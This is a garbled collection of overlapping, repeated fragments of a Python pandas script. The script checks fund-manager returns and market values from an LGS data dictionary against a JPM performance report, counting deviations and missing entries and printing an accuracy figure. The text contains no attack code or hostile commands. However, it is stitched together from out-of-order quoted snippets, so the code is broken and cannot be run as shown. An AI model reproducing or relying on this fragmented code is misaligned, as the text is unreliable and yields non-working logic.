len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >=", "= 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary 
Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date", "JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count:", "df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity", "JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio Only #", "Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath))", "= pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap", "0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0,", "# Prints open accounts that are missing from LGS. print('\\nMissing completely from LGS',", "= set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been checked. lgs_check_set", "sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode',", "= pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM", "lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. 
df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True)", "lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that are", "df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } )", "df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not", "pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance", "= set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open accounts but", "deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy:", "'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in", "Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs", "(not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i],", "managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS", "containing liquidity accounts. 
df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set", "202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31)", "= df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # #", "in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2]", "that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name':", "deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)):", "= df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict", "df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later =", "# df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']]", "FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT #", "accuracy, '%') # Checks for managers that have been completely missed. # Creates", "JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N',", "that are open accounts but are not checked. 
df_lgs_missing_completely = lgs_open_set - lgs_check_set", "df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1)", "# # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market", "'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy", "ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page 8': df_sheet", "0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation =", "how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM", "print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count,", "accounts. 
df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager']))", "filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel(", "market values from JPM IAP with JPM HTS # df_jpm_main = pd\\ #", "pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True)", "Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have", "# jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date']", "columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations", "list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs,", "= round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from", "missing from LGS. 
print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By", "1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])):", "LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All;", "df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename(", "= df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count +=", "= df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) #", "= pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy", "== 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM", "'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count -", "'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O',", "'Accuracy: ', accuracy, '%') # Checks for managers that have been completely missed.", "- lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that are missing", "open accounts but are not checked. 
df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set", "jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ',", "right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates", "df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value']", "= df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates", "pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) #", "if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column']", "'60_Return': '5 Years', '84_Return': '7 Years' } # Performs the deviant check df_deviations", ") # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page", "dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report", "jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] =", "+= 1 # Fixes the column names columns_fix = [] for column in", "Creates set containing fund managers that are open accounts but are not checked.", "that have been completely missed. 
# Creates set containing fund managers that are", "= df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts.", "for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp =", "sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]),", "have been completely missed. # Creates set containing fund managers that are currently", "Performs the deviant check df_deviations = pd.DataFrame() deviants = [] columns = []", "= list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge(", "dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3", "fund managers that are open accounts but are not checked. df_lgs_missing_completely = lgs_open_set", ".merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right'", "7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:',", "'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for", "Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y',", "from JPM IAP with JPM HTS # df_jpm_main = pd\\ # .merge( #", "pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) #", "= pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # )", "df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary", "31) # End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) #", 
"set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity =", "# Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check", "USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary", "pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page", "columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints", "# Creates set containing fund managers that are currently open accounts. df_lgs_open =", "= [] for column in columns: if column == 'Market Value_y': columns_fix.append('Market Value')", "df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100,", "completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts;", "'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm =", "print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe", "if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes", "lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx'", "'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. 
df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS", "- deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from LGS', lgs_missing)", "[np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM", "= sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx", "'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD =", "df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) #", "{ 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O',", "Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set", "+= 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not", "set containing fund managers that are open accounts but are not checked. 
df_lgs_missing_completely", "LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n')", "'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet ==", "Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing", "sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6", "df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and", "axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers", "Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS", "deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing", "Checks for managers that have been completely missed. # Creates set containing fund", "Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page", "= [] columns = [] deviations = [] jpm_missing = [] lgs_missing =", "Creates set containing strategies. 
df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name':", "= pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename)", "df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath +", "df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2)", "skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) #", "column names columns_fix = [] for column in columns: if column == 'Market", "NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns", "df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market values", "# jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() #", "as np import pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv'", "sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date',", "JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, #", "Fixes the column names columns_fix = [] for column in columns: if column", "for column in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column)", "for managers that have been completely missed. 
# Creates set containing fund managers", "df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # #", "Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' #", "df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName',", "deviations = [] jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count", "4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True)", "right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ # .sort_values(['Manager',", "print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy,", "= set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy", "range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn)", "'1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3", "# header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap =", "missed. # Creates set containing fund managers that are currently open accounts. 
df_lgs_open", "'1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years',", "= df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers", "NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O'", "fund managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open =", "(pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the", "dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap =", "# skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8]))", "6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet,", "if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed:", "NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet)", "# Creates set containing strategies. 
df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS", "= [] total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items():", "df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager',", "LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return':", "Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031", "'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations']", "footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan,", "as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary", "'12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' }", "in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( #", "df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm", "= set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. 
df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity", "= df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market", "Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name':", "+ [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm,", "} ) if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0':", "JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month',", "dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS table df_lgs =", "= [] deviations = [] jpm_missing = [] lgs_missing = [] total_count =", "ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names columns_fix = []", "Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath", "= df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) #", "df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) #", "Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio Only", "total_count = 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i", "# # # Merges the market values from JPM IAP with JPM HTS", "2) # Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during", "lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): 
jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 #", "deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i]))", "'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'],", "lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total", "skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1':", "'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in", "# Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio", "IAP with JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, #", "'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items():", "df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy =", "accounts. 
df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager']))", ") if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode',", "Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames", "- lgs_liquidity_set - {np.nan} # Prints open accounts that are missing from LGS.", "jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11", "Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020,", "Value') else: 